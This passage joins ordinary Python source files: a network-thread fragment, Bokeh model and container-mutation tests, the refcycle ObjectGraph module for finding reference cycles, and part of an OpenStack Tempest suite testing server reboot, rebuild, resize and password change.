self.sockets[ip].close()
except:
pass
del self.sockets[ip]
# thread exit
elif message_type == 'exit':
self.running = False
receiver_running = False
for s in self.sockets.values():
s.close()
self.logger.info('NetworkThread thread ended')
|
|
from __future__ import absolute_import
import copy
import pytest
from six.moves import xrange
from bokeh.core.properties import List, String, Instance, Dict, Any, Int
from bokeh.model import Model
from bokeh.core.property.wrappers import PropertyValueList, PropertyValueDict
from bokeh.util.future import with_metaclass
def large_plot(n):
from bokeh.models import (
Plot, LinearAxis, Grid, GlyphRenderer,
ColumnDataSource, DataRange1d, PanTool, ZoomInTool, ZoomOutTool, WheelZoomTool, BoxZoomTool,
BoxSelectTool, SaveTool, ResetTool
)
from bokeh.models.layouts import Column
from bokeh.models.glyphs import Line
col = Column()
objects = set([col])
for i in xrange(n):
source = ColumnDataSource(data=dict(x=[0, i + 1], y=[0, i + 1]))
xdr = DataRange1d()
ydr = DataRange1d()
plot = Plot(x_range=xdr, y_range=ydr)
xaxis = LinearAxis(plot=plot)
yaxis = LinearAxis(plot=plot)
xgrid = Grid(plot=plot, dimension=0)
ygrid = Grid(plot=plot, dimension=1)
tickers = [xaxis.ticker, xaxis.formatter, yaxis.ticker, yaxis.formatter]
glyph = Line(x='x', y='y')
renderer = GlyphRenderer(data_source=source, glyph=glyph)
plot.renderers.append(renderer)
pan = PanTool()
zoom_in = ZoomInTool()
zoom_out = ZoomOutTool()
wheel_zoom = WheelZoomTool()
box_zoom = BoxZoomTool()
box_select = BoxSelectTool()
save = SaveTool()
reset = ResetTool()
tools = [pan, zoom_in, zoom_out, wheel_zoom, box_zoom, box_select, save, reset]
plot.add_tools(*tools)
col.children.append(plot)
objects |= set([
xdr, ydr,
xaxis, yaxis,
xgrid, ygrid,
renderer, renderer.view, glyph,
source, source.selected, source.selection_policy,
plot, plot.x_scale, plot.y_scale, plot.toolbar, plot.title,
box_zoom.overlay, box_select.overlay,
] + tickers + tools)
return col, objects
class TestMetaModel(object):
def setup_method(self):
from bokeh.model import MetaModel
self.metamodel = MetaModel
self.old_map = copy.copy(self.metamodel.model_class_reverse_map)
def teardown_method(self):
self.metamodel.model_class_reverse_map = self.old_map
def mkclass(self):
class Test_Class(with_metaclass(self.metamodel)):
foo = 1
return Test_Class
def test_metaclassing(self):
tclass = self.mkclass()
assert hasattr(tclass, '__view_model__')
with pytest.raises(Warning):
self.mkclass()
def test_get_class(self):
from bokeh.model import get_class
self.mkclass()
tclass = get_class('Test_Class')
assert hasattr(tclass, 'foo')
with pytest.raises(KeyError):
get_class('Imaginary_Class')
class DeepModel(Model):
child = Instance(Model)
class TestCollectModels(object):
def test_references_large(self):
root, objects = large_plot(10)
assert set(root.references()) == objects
def test_references_deep(self):
root = DeepModel()
objects = set([root])
parent = root
# in a previous implementation, about 400 would blow max
# recursion depth, so we double that and a little bit,
# here.
for i in xrange(900):
model = DeepModel()
objects.add(model)
parent.child = model
parent = model
assert set(root.references()) == objects
class SomeModelToJson(Model):
child = Instance(Model)
foo = Int()
bar = String()
class TestModel(object):
def setup_method(self):
from bokeh.models import Model
self.pObjectClass = Model
self.maxDiff = None
def test_init(self):
testObject = self.pObjectClass(id='test_id')
assert testObject._id == 'test_id'
testObject2 = self.pObjectClass()
assert testObject2._id is not None
assert set(["name", "tags", "js_property_callbacks", "subscribed_events", "js_event_callbacks"]) == testObject.properties()
assert dict(
name=None, tags=[], js_property_callbacks={}, js_event_callbacks={}, subscribed_events=[]
) == testObject.properties_with_values(include_defaults=True)
assert dict() == testObject.properties_with_values(include_defaults=False)
def test_ref(self):
testObject = self.pObjectClass(id='test_id')
assert {'type': 'Model', 'id': 'test_id'} == testObject.ref
def test_references_by_ref_by_value(self):
from bokeh.core.has_props import HasProps
from bokeh.core.properties import Instance, Int
class T(self.pObjectClass):
t = Int(0)
class Y(self.pObjectClass):
t1 = Instance(T)
class Z1(HasProps):
t2 = Instance(T)
class Z2(self.pObjectClass):
t2 = Instance(T)
class X1(self.pObjectClass):
y = Instance(Y)
z1 = Instance(Z1)
class X2(self.pObjectClass):
y = Instance(Y)
z2 = Instance(Z2)
t1, t2 = T(t=1), T(t=2)
y = Y(t1=t1)
z1, z2 = Z1(t2=t2), Z2(t2=t2)
x1 = X1(y=y, z1=z1)
x2 = X2(y=y, z2=z2)
assert x1.references() == {t1, y, t2, x1}
assert x2.references() == {t1, y, t2, z2, x2}
def test_references_in_containers(self):
from bokeh.core.properties import Int, String, Instance, List, Tuple, Dict
# XXX: can't use Y, because of:
#
# Warning: Duplicate __view_model__ declaration of 'Y' for class Y.
# Previous definition: <class 'bokeh.tests.test_objects.Y'>
class U(self.pObjectClass):
a = Int
class V(self.pObjectClass):
u1 = Instance(U)
u2 = List(Instance(U))
u3 = Tuple(Int, Instance(U))
u4 = Dict(String, Instance(U))
u5 = Dict(String, List(Instance(U)))
u1, u2, u3, u4, u5 = U(a=1), U(a=2), U(a=3), U(a=4), U(a=5)
v = V(u1=u1, u2=[u2], u3=(3, u3), u4={"4": u4}, u5={"5": [u5]})
assert v.references() == set([v, u1, u2, u3, u4, u5])
def test_to_json(self):
child_obj = SomeModelToJson(foo=57, bar="hello")
obj = SomeModelToJson(child=child_obj,
foo=42, bar="world")
json = obj.to_json(include_defaults=True)
json_string = obj.to_json_string(include_defaults=True)
assert { "child" : { "id" : child_obj._id, "type" : "SomeModelToJson" },
"id" : obj._id,
"name" : None,
"tags" : [],
'js_property_callbacks': {},
"js_event_callbacks" : {},
"subscribed_events" : [],
"foo" : 42,
"bar" : "world" } == json
assert ('{"bar":"world",' +
'"child":{"id":"%s","type":"SomeModelToJson"},' +
'"foo":42,"id":"%s","js_event_callbacks":{},"js_property_callbacks":{},' +
'"name":null,"subscribed_events":[],"tags":[]}') % (child_obj._id, obj._id) == json_string
def test_no_units_in_json(self):
from bokeh.models import AnnularWedge
obj = AnnularWedge()
json = obj.to_json(include_defaults=True)
assert 'start_angle' in json
assert 'start_angle_units' not in json
assert 'outer_radius' in json
assert 'outer_radius_units' not in json
def test_dataspec_field_in_json(self):
from bokeh.models import AnnularWedge
obj = AnnularWedge()
obj.start_angle = "fieldname"
json = obj.to_json(include_defaults=True)
assert 'start_angle' in json
assert 'start_angle_units' not in json
assert dict(units='rad', field='fieldname') == json['start_angle']
def test_dataspec_value_in_json(self):
from bokeh.models import AnnularWedge
obj = AnnularWedge()
obj.start_angle = 60
json = obj.to_json(include_defaults=True)
assert 'start_angle' in json
assert 'start_angle_units' not in json
assert dict(units='rad', value=60) == json['start_angle']
def test_list_default(self):
class HasListDefault(Model):
value = List(String, default=["hello"])
obj = HasListDefault()
assert obj.value == obj.value
# 'value' should not be included because we haven't modified it
assert 'value' not in obj.properties_with_values(include_defaults=False)
# (but should be in include_defaults=True)
assert 'value' in obj.properties_with_values(include_defaults=True)
obj.value.append("world")
# 'value' should now be included
assert 'value' in obj.properties_with_values(include_defaults=False)
def test_dict_default(self):
class HasDictDefault(Model):
value = Dict(String, Int, default=dict(hello=42))
obj = HasDictDefault()
assert obj.value == obj.value
assert dict(hello=42) == obj.value
# 'value' should not be included because we haven't modified it
assert 'value' not in obj.properties_with_values(include_defaults=False)
# (but should be in include_defaults=True)
assert 'value' in obj.properties_with_values(include_defaults=True)
obj.value['world'] = 57
# 'value' should now be included
assert 'value' in obj.properties_with_values(include_defaults=False)
assert dict(hello=42, world=57) == obj.value
def test_func_default_with_counter(self):
counter = dict(value=0)
def next_value():
counter['value'] += 1
return counter['value']
class HasFuncDefaultInt(Model):
value = Int(default=next_value)
obj1 = HasFuncDefaultInt()
obj2 = HasFuncDefaultInt()
assert obj1.value+1 == obj2.value
# 'value' is a default, but it gets included as a
# non-default because it's unstable.
assert 'value' in obj1.properties_with_values(include_defaults=False)
def test_func_default_with_model(self):
class HasFuncDefaultModel(Model):
child = Instance(Model, lambda: Model())
obj1 = HasFuncDefaultModel()
obj2 = HasFuncDefaultModel()
assert obj1.child._id != obj2.child._id
# 'child' is a default, but it gets included as a
# non-default because it's unstable.
assert 'child' in obj1.properties_with_values(include_defaults=False)
class TestContainerMutation(object):
def _check_mutation(self, obj, attr, mutator, expected_event_old, expected_event_new):
result = dict(calls=[])
def record_trigger(attr, old, new_):
result['calls'].append((attr, old, new_))
obj.on_change(attr, record_trigger)
try:
actual_old = getattr(obj, attr)
assert expected_event_old == actual_old
mutator(actual_old)
assert expected_event_new == getattr(obj, attr)
finally:
obj.remove_on_change(attr, record_trigger)
assert 1 == len(result['calls'])
call = result['calls'][0]
assert attr == call[0]
assert expected_event_old == call[1]
assert expected_event_new == call[2]
class HasListProp(Model):
foo = List(String)
def __init__(self, **kwargs):
super(HasListProp, self).__init__(**kwargs)
class TestListMutation(TestContainerMutation):
def test_whether_included_in_props_with_values(self):
obj = HasListProp()
assert 'foo' not in obj.properties_with_values(include_defaults=False)
assert 'foo' in obj.properties_with_values(include_defaults=True)
# simply reading the property creates a new wrapper, so be
# sure that doesn't count as replacing the default
foo = obj.foo
assert foo == foo # this is to calm down flake's unused var warning
assert 'foo' not in obj.properties_with_values(include_defaults=False)
assert 'foo' in obj.properties_with_values(include_defaults=True)
# but changing the list should count as replacing the default
obj.foo.append("hello")
assert 'foo' in obj.properties_with_values(include_defaults=False)
assert 'foo' in obj.properties_with_values(include_defaults=True)
def test_assignment_maintains_owners(self):
obj = HasListProp()
old_list = obj.foo
assert isinstance(old_list, PropertyValueList)
assert 1 == len(old_list._owners)
obj.foo = ["a"]
new_list = obj.foo
assert isinstance(new_list, PropertyValueList)
assert old_list is not new_list
assert 0 == len(old_list._owners)
assert 1 == len(new_list._owners)
def test_list_delitem(self):
obj = HasListProp(foo=["a", "b", "c"])
assert isinstance(obj.foo, PropertyValueList)
def mutate(x):
del x[1]
self._check_mutation(obj, 'foo', mutate,
["a", "b", "c"],
["a", "c"])
def test_list_delslice(self):
obj = HasListProp(foo=["a", "b", "c", "d"])
assert isinstance(obj.foo, PropertyValueList)
def mutate(x):
del x[1:3]
self._check_mutation(obj, 'foo', mutate,
["a", "b", "c", "d"],
["a", "d"])
def test_list_iadd(self):
obj = HasListProp(foo=["a"])
assert isinstance(obj.foo, PropertyValueList)
def mutate(x):
x += ["b"]
self._check_mutation(obj, 'foo', mutate,
["a"],
["a", "b"])
def test_list_imul(self):
obj = HasListProp(foo=["a"])
assert isinstance(obj.foo, PropertyValueList)
def mutate(x):
x *= 3
self._check_mutation(obj, 'foo', mutate,
["a"],
["a", "a", "a"])
def test_list_setitem(self):
obj = HasListProp(foo=["a"])
assert isinstance(obj.foo, PropertyValueList)
def mutate(x):
x[0] = "b"
self._check_mutation(obj, 'foo', mutate,
["a"],
["b"])
def test_list_setslice(self):
obj = HasListProp(foo=["a", "b", "c", "d"])
assert isinstance(obj.foo, PropertyValueList)
def mutate(x):
x[1:3] = ["x"]
self._check_mutation(obj, 'foo', mutate,
["a", "b", "c", "d"],
["a", "x", "d"])
def test_list_append(self):
obj = HasListProp()
assert isinstance(obj.foo, PropertyValueList)
self._check_mutation(obj, 'foo', lambda x: x.append("bar"), [], ["bar"])
def test_list_extend(self):
obj = HasListProp()
assert isinstance(obj.foo, PropertyValueList)
self._check_mutation(obj, 'foo', lambda x: x.extend(["x", "y"]), [], ["x", "y"])
def test_list_insert(self):
obj = HasListProp(foo=["a", "b"])
assert isinstance(obj.foo, PropertyValueList)
self._check_mutation(obj, 'foo', lambda x: x.insert(1, "x"),
["a", "b"],
["a", "x", "b"])
def test_list_pop(self):
obj = HasListProp(foo=["a", "b"])
assert isinstance(obj.foo, PropertyValueList)
self._check_mutation(obj, 'foo', lambda x: x.pop(),
["a", "b"],
["a"])
def test_list_remove(self):
obj = HasListProp(foo=["a", "b"])
assert isinstance(obj.foo, PropertyValueList)
self._check_mutation(obj, 'foo', lambda x: x.remove("b"),
["a", "b"],
["a"])
def test_list_reverse(self):
obj = HasListProp(foo=["a", "b"])
assert isinstance(obj.foo, PropertyValueList)
self._check_mutation(obj, 'foo', lambda x: x.reverse(),
["a", "b"],
["b", "a"])
def test_list_sort(self):
obj = HasListProp(foo=["b", "a"])
assert isinstance(obj.foo, PropertyValueList)
self._check_mutation(obj, 'foo', lambda x: x.sort(),
["b", "a"],
["a", "b"])
class HasStringDictProp(Model):
foo = Dict(String, Any)
def __init__(self, **kwargs):
super(HasStringDictProp, self).__init__(**kwargs)
class HasIntDictProp(Model):
foo = Dict(Int, Any)
def __init__(self, **kwargs):
super(HasIntDictProp, self).__init__(**kwargs)
class TestDictMutation(TestContainerMutation):
def test_whether_included_in_props_with_values(self):
obj = HasStringDictProp()
assert 'foo' not in obj.properties_with_values(include_defaults=False)
assert 'foo' in obj.properties_with_values(include_defaults=True)
# simply reading the property creates a new wrapper, so be
# sure that doesn't count as replacing the default
foo = obj.foo
assert foo == foo # this is to calm down flake's unused var warning
assert 'foo' not in obj.properties_with_values(include_defaults=False)
assert 'foo' in obj.properties_with_values(include_defaults=True)
# but changing the dict should count as replacing the default
obj.foo['bar'] = 42
assert 'foo' in obj.properties_with_values(include_defaults=False)
assert 'foo' in obj.properties_with_values(include_defaults=True)
def test_assignment_maintains_owners(self):
obj = HasStringDictProp()
old_dict = obj.foo
assert isinstance(old_dict, PropertyValueDict)
assert 1 == len(old_dict._owners)
obj.foo = dict(a=1)
new_dict = obj.foo
assert isinstance(new_dict, PropertyValueDict)
assert old_dict is not new_dict
assert 0 == len(old_dict._owners)
assert 1 == len(new_dict._owners)
def test_dict_delitem_string(self):
obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
assert isinstance(obj.foo, PropertyValueDict)
def mutate(x):
del x['b']
self._check_mutation(obj, 'foo', mutate,
dict(a=1, b=2, c=3),
dict(a=1, c=3))
def test_dict_delitem_int(self):
obj = HasIntDictProp(foo={ 1 : "a", 2 : "b", 3 : "c" })
assert isinstance(obj.foo, PropertyValueDict)
def mutate(x):
del x[1]
self._check_mutation(obj, 'foo', mutate,
{ 1 : "a", 2 : "b", 3 : "c" },
{ 2 : "b", 3 : "c" })
def test_dict_setitem_string(self):
obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
assert isinstance(obj.foo, PropertyValueDict)
def mutate(x):
x['b'] = 42
self._check_mutation(obj, 'foo', mutate,
dict(a=1, b=2, c=3),
dict(a=1, b=42, c=3))
def test_dict_setitem_int(self):
obj = HasIntDictProp(foo={ 1 : "a", 2 : "b", 3 : "c" })
assert isinstance(obj.foo, PropertyValueDict)
def mutate(x):
x[2] = "bar"
self._check_mutation(obj, 'foo', mutate,
{ 1 : "a", 2 : "b", 3 : "c" },
{ 1 : "a", 2 : "bar", 3 : "c" })
def test_dict_clear(self):
obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
assert isinstance(obj.foo, PropertyValueDict)
def mutate(x):
x.clear()
self._check_mutation(obj, 'foo', mutate,
dict(a=1, b=2, c=3),
dict())
def test_dict_pop(self):
obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
assert isinstance(obj.foo, PropertyValueDict)
def mutate(x):
x.pop('b')
self._check_mutation(obj, 'foo', mutate,
dict(a=1, b=2, c=3),
dict(a=1, c=3))
def test_dict_pop_default_works(self):
obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
assert isinstance(obj.foo, PropertyValueDict)
assert 42 == obj.foo.pop('z', 42)
def test_dict_popitem_works(self):
obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
assert isinstance(obj.foo, PropertyValueDict)
i = obj.foo.popitem()
assert i == ('a', 1) or i == ('b', 2) or i == ('c', 3)
# we don't _check_mutation since the end value is nondeterministic
def test_dict_setdefault(self):
obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
assert isinstance(obj.foo, PropertyValueDict)
def mutate(x):
b = x.setdefault('b', 43)
assert 2 == b
z = x.setdefault('z', 44)
assert 44 == z
self._check_mutation(obj, 'foo', mutate,
dict(a=1, b=2, c=3),
dict(a=1, b=2, c=3, z=44))
def test_dict_update(self):
obj = HasStringDictProp(foo=dict(a=1, b=2, c=3))
assert isinstance(obj.foo, PropertyValueDict)
def mutate(x):
x.update(dict(b=7, c=8))
self._check_mutation(obj, 'foo', mutate,
dict(a=1, b=2, c=3),
dict(a=1, b=7, c=8))
|
|
# Copyright 2013 Mark Dickinson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tools to analyze the Python object graph and find reference cycles.
"""
import gc
import itertools
import six
from refcycle.annotations import object_annotation, annotated_references
from refcycle.annotated_graph import (
AnnotatedEdge,
AnnotatedGraph,
AnnotatedVertex,
)
from refcycle.element_transform_set import ElementTransformSet
from refcycle.key_transform_dict import KeyTransformDict
from refcycle.i_directed_graph import IDirectedGraph
class ObjectGraph(IDirectedGraph):
"""Directed graph representing a collection of Python objects and the
references between them.
An ObjectGraph can be constructed directly from an existing iterable
collection of objects::
>>> from refcycle import ObjectGraph
>>> inner = [1, 2, 3]
>>> outer = [inner] * 3
>>> graph = ObjectGraph([outer, inner])
>>> graph
<refcycle.object_graph.ObjectGraph object of size 2 at 0x100470ed0>
This constructs a graph whose vertices are the two Python objects ``inner``
and ``outer``. All references between the given objects are automatically
added as graph edges.
The ObjectGraph acts as a container for those objects, much like a set::
>>> inner in graph
True
>>> 2 in graph
False
>>> len(graph)
2
>>> list(graph)
[[[1, 2, 3], [1, 2, 3], [1, 2, 3]], [1, 2, 3]]
We can find the referrers and referents of any particular object in the
graph using the :meth:`~refcycle.object_graph.ObjectGraph.parents` and
:meth:`~refcycle.object_graph.ObjectGraph.children` methods.
>>> graph.children(outer)
[[1, 2, 3], [1, 2, 3], [1, 2, 3]]
Here we see ``inner`` occurring three times as a child of ``outer``,
because there are three distinct references from ``outer`` to ``inner``.
"""
###########################################################################
### IDirectedGraph interface.
###########################################################################
def head(self, edge):
"""
Return the head (target, destination) of the given edge.
"""
return self._head[edge]
def tail(self, edge):
"""
Return the tail (source) of the given edge.
"""
return self._tail[edge]
def out_edges(self, vertex):
"""
Return a list of the edges leaving this vertex.
"""
return self._out_edges[vertex]
def in_edges(self, vertex):
"""
Return a list of the edges entering this vertex.
"""
return self._in_edges[vertex]
@property
def vertices(self):
"""
Return collection of vertices of the graph.
"""
return self._vertices
@property
def edges(self):
"""
Return collection of edges of the graph.
"""
return self._edges
def full_subgraph(self, objects):
"""
Return the subgraph of this graph whose vertices
are the given ones and whose edges are the edges
of the original graph between those vertices.
"""
vertices = ElementTransformSet(transform=id)
out_edges = KeyTransformDict(transform=id)
in_edges = KeyTransformDict(transform=id)
for obj in objects:
vertices.add(obj)
out_edges[obj] = []
in_edges[obj] = []
edges = set()
head = {}
tail = {}
for referrer in vertices:
for edge in self._out_edges[referrer]:
referent = self._head[edge]
if referent not in vertices:
continue
edges.add(edge)
tail[edge] = referrer
head[edge] = referent
out_edges[referrer].append(edge)
in_edges[referent].append(edge)
return ObjectGraph._raw(
vertices=vertices,
edges=edges,
out_edges=out_edges,
in_edges=in_edges,
head=head,
tail=tail,
)
###########################################################################
### Set and dict overrides.
###########################################################################
@classmethod
def vertex_set(cls):
return ElementTransformSet(transform=id)
@classmethod
def vertex_dict(cls):
return KeyTransformDict(transform=id)
@classmethod
def vertex_equal(cls, vertex1, vertex2):
return vertex1 is vertex2
###########################################################################
### ObjectGraph constructors.
###########################################################################
@classmethod
def _raw(cls, vertices, edges, out_edges, in_edges, head, tail):
"""
Private constructor for direct construction
of an ObjectGraph from its attributes.
vertices is the collection of vertices
out_edges and in_edges map vertices to lists of edges
head and tail map edges to objects.
"""
self = object.__new__(cls)
self._out_edges = out_edges
self._in_edges = in_edges
self._head = head
self._tail = tail
self._vertices = vertices
self._edges = edges
return self
@classmethod
def _from_objects(cls, objects):
"""
Private constructor: create graph from the given Python objects.
The constructor examines the referents of each given object to build up
a graph showing the objects and their links.
"""
vertices = ElementTransformSet(transform=id)
out_edges = KeyTransformDict(transform=id)
in_edges = KeyTransformDict(transform=id)
for obj in objects:
vertices.add(obj)
out_edges[obj] = []
in_edges[obj] = []
# Edges are identified by simple integers, so
# we can use plain dictionaries for mapping
# edges to their heads and tails.
edge_label = itertools.count()
edges = set()
head = {}
tail = {}
for referrer in vertices:
for referent in gc.get_referents(referrer):
if referent not in vertices:
continue
edge = next(edge_label)
edges.add(edge)
tail[edge] = referrer
head[edge] = referent
out_edges[referrer].append(edge)
in_edges[referent].append(edge)
return cls._raw(
vertices=vertices,
edges=edges,
out_edges=out_edges,
in_edges=in_edges,
head=head,
tail=tail,
)
def __new__(cls, objects=()):
return cls._from_objects(objects)
###########################################################################
### Annotations.
###########################################################################
def annotated(self):
"""
Annotate this graph, returning an AnnotatedGraph object
with the same structure.
"""
# Build up dictionary of edge annotations.
edge_annotations = {}
for edge in self.edges:
if edge not in edge_annotations:
# We annotate all edges from a given object at once.
referrer = self._tail[edge]
known_refs = annotated_references(referrer)
for out_edge in self._out_edges[referrer]:
referent = self._head[out_edge]
if known_refs[referent]:
annotation = known_refs[referent].pop()
else:
annotation = None
edge_annotations[out_edge] = annotation
annotated_vertices = [
AnnotatedVertex(
id=id(vertex),
annotation=object_annotation(vertex),
)
for vertex in self.vertices
]
annotated_edges = [
AnnotatedEdge(
id=edge,
annotation=edge_annotations[edge],
head=id(self._head[edge]),
tail=id(self._tail[edge]),
)
for edge in self.edges
]
return AnnotatedGraph(
vertices=annotated_vertices,
edges=annotated_edges,
)
def export_image(self, filename='refcycle.png', format=None,
dot_executable='dot'):
"""
Export graph as an image.
This requires that Graphviz is installed and that the ``dot``
executable is in your path.
The *filename* argument specifies the output filename.
The *format* argument lets you specify the output format. It may be
any format that ``dot`` understands, including extended format
specifications like ``png:cairo``. If omitted, the filename extension
will be used; if no filename extension is present, ``png`` will be
used.
The *dot_executable* argument lets you provide a full path to the
``dot`` executable if necessary.
"""
return self.annotated().export_image(
filename=filename,
format=format,
dot_executable=dot_executable,
)
###########################################################################
### JSON serialization.
###########################################################################
def to_json(self):
"""
Convert to a JSON string.
"""
return self.annotated().to_json()
def export_json(self, filename):
"""
Export graph in JSON form to the given file.
"""
self.annotated().export_json(filename=filename)
def to_dot(self):
"""
Produce a graph in DOT format.
"""
return self.annotated().to_dot()
###########################################################################
### Other utility methods.
###########################################################################
def owned_objects(self):
"""
List of gc-tracked objects owned by this ObjectGraph instance.
"""
return (
[
self,
self.__dict__,
self._head,
self._tail,
self._out_edges,
self._out_edges._keys,
self._out_edges._values,
self._in_edges,
self._in_edges._keys,
self._in_edges._values,
self._vertices,
self._vertices._elements,
self._edges,
] +
list(six.itervalues(self._out_edges)) +
list(six.itervalues(self._in_edges))
)
def find_by_typename(self, typename):
"""
List of all objects whose type has the given name.
"""
return self.find_by(lambda obj: type(obj).__name__ == typename)
def count_by_typename(self):
"""Classify objects by type name.
Returns a collections.Counter instance mapping type names to the number
of objects `obj` in this graph for which `type(obj).__name__` matches
that type name.
"""
return self.count_by(lambda obj: type(obj).__name__)
|
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import urlparse
import testtools
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest.common.utils.linux import remote_client
from tempest import config
from tempest import exceptions
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class ServerActionsV3Test(base.BaseV3ComputeTest):
run_ssh = CONF.compute.run_ssh
def setUp(self):
# NOTE(afazekas): Normally we use the same server with all test cases,
# but if it has an issue, we build a new one
super(ServerActionsV3Test, self).setUp()
# Check if the server is in a clean state after test
try:
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
except Exception:
# Rebuild server if something happened to it during a test
self.__class__.server_id = self.rebuild_server(self.server_id)
def tearDown(self):
_, server = self.client.get_server(self.server_id)
self.assertEqual(self.image_ref, server['image']['id'])
self.server_check_teardown()
super(ServerActionsV3Test, self).tearDown()
@classmethod
def resource_setup(cls):
cls.prepare_instance_network()
super(ServerActionsV3Test, cls).resource_setup()
cls.client = cls.servers_client
cls.server_id = cls.rebuild_server(None)
@testtools.skipUnless(CONF.compute_feature_enabled.change_password,
'Change password not available.')
@test.attr(type='gate')
def test_change_server_password(self):
# The server's password should be set to the provided password
new_password = 'Newpass1234'
resp, body = self.client.change_password(self.server_id, new_password)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
if self.run_ssh:
# Verify that the user can authenticate with the new password
resp, server = self.client.get_server(self.server_id)
linux_client = remote_client.RemoteClient(server, self.ssh_user,
new_password)
linux_client.validate_authentication()
@test.attr(type='smoke')
def test_reboot_server_hard(self):
# The server should be power cycled
if self.run_ssh:
# Get the time the server was last rebooted,
resp, server = self.client.get_server(self.server_id)
linux_client = remote_client.RemoteClient(server, self.ssh_user,
self.password)
boot_time = linux_client.get_boot_time()
resp, body = self.client.reboot(self.server_id, 'HARD')
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
if self.run_ssh:
# Log in and verify the boot time has changed
linux_client = remote_client.RemoteClient(server, self.ssh_user,
self.password)
new_boot_time = linux_client.get_boot_time()
self.assertGreater(new_boot_time, boot_time)
@test.skip_because(bug="1014647")
@test.attr(type='smoke')
def test_reboot_server_soft(self):
# The server should be signaled to reboot gracefully
if self.run_ssh:
# Get the time the server was last rebooted,
resp, server = self.client.get_server(self.server_id)
linux_client = remote_client.RemoteClient(server, self.ssh_user,
self.password)
boot_time = linux_client.get_boot_time()
resp, body = self.client.reboot(self.server_id, 'SOFT')
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'ACTIVE')
if self.run_ssh:
# Log in and verify the boot time has changed
linux_client = remote_client.RemoteClient(server, self.ssh_user,
self.password)
new_boot_time = linux_client.get_boot_time()
self.assertGreater(new_boot_time, boot_time)
@test.attr(type='smoke')
def test_rebuild_server(self):
# The server should be rebuilt using the provided image and data
meta = {'rebuild': 'server'}
new_name = data_utils.rand_name('server')
password = 'rebuildPassw0rd'
resp, rebuilt_server = self.client.rebuild(self.server_id,
self.image_ref_alt,
name=new_name,
metadata=meta,
admin_password=password)
# Verify the properties in the initial response are correct
self.assertEqual(self.server_id, rebuilt_server['id'])
rebuilt_image_id = rebuilt_server['image']['id']
self.assertTrue(self.image_ref_alt.endswith(rebuilt_image_id))
self.assertEqual(self.flavor_ref, rebuilt_server['flavor']['id'])
# Verify the server properties after the rebuild completes
self.client.wait_for_server_status(rebuilt_server['id'], 'ACTIVE')
resp, server = self.client.get_server(rebuilt_server['id'])
rebuilt_image_id = server['image']['id']
self.assertTrue(self.image_ref_alt.endswith(rebuilt_image_id))
self.assertEqual(new_name, server['name'])
if self.run_ssh:
# Verify that the user can authenticate with the provided password
linux_client = remote_client.RemoteClient(server, self.ssh_user,
password)
linux_client.validate_authentication()
if self.image_ref_alt != self.image_ref:
self.client.rebuild(self.server_id, self.image_ref)
@test.attr(type='gate')
def test_rebuild_server_in_stop_state(self):
# The server in stop state should be rebuilt using the provided
# image and remain in SHUTOFF state
resp, server = self.client.get_server(self.server_id)
old_image = server['image']['id']
new_image = self.image_ref_alt \
if old_image == self.image_ref else self.image_ref
resp, server = self.client.stop(self.server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'SHUTOFF')
resp, rebuilt_server = self.client.rebuild(self.server_id, new_image)
# Verify the properties in the initial response are correct
self.assertEqual(self.server_id, rebuilt_server['id'])
rebuilt_image_id = rebuilt_server['image']['id']
self.assertEqual(new_image, rebuilt_image_id)
self.assertEqual(self.flavor_ref, rebuilt_server['flavor']['id'])
# Verify the server properties after the rebuild completes
self.client.wait_for_server_status(rebuilt_server['id'], 'SHUTOFF')
resp, server = self.client.get_server(rebuilt_server['id'])
rebuilt_image_id = server['image']['id']
self.assertEqual(new_image, rebuilt_image_id)
# Restore to the original image (The tearDown will test it again)
if self.image_ref_alt != self.image_ref:
self.client.rebuild(self.server_id, old_image)
self.client.wait_for_server_status(self.server_id, 'SHUTOFF')
self.client.start(self.server_id)
def _detect_server_image_flavor(self, server_id):
# Detects the current server image flavor ref.
resp, server = self.client.get_server(server_id)
current_flavor = server['flavor']['id']
new_flavor_ref = self.flavor_ref_alt \
if current_flavor == self.flavor_ref else self.flavor_ref
return current_flavor, new_flavor_ref
def _test_resize_server_confirm(self, stop=False):
# The server's RAM and disk space should be modified to that of
# the provided flavor
previous_flavor_ref, new_flavor_ref = \
self._detect_server_image_flavor(self.server_id)
if stop:
resp = self.servers_client.stop(self.server_id)[0]
self.assertEqual(202, resp.status)
self.servers_client.wait_for_server_status(self.server_id,
'SHUTOFF')
resp, server = self.client.resize(self.server_id, new_flavor_ref)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(self.server_id, 'VERIFY_RESIZE')
self.client.confirm_resize(self.server_id)
expected_status = 'SHUTOFF' if stop else 'ACTIVE'
self.client.wait_for_server_status(self.server_id, expected_status)
resp, server = self.client.get_server(self.server_id)
self.assertEqual(new_flavor_ref, server['flavor']['id'])
if stop:
# NOTE(mriedem): tearDown requires the server to be started.
self.client.start(self.server_id)
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
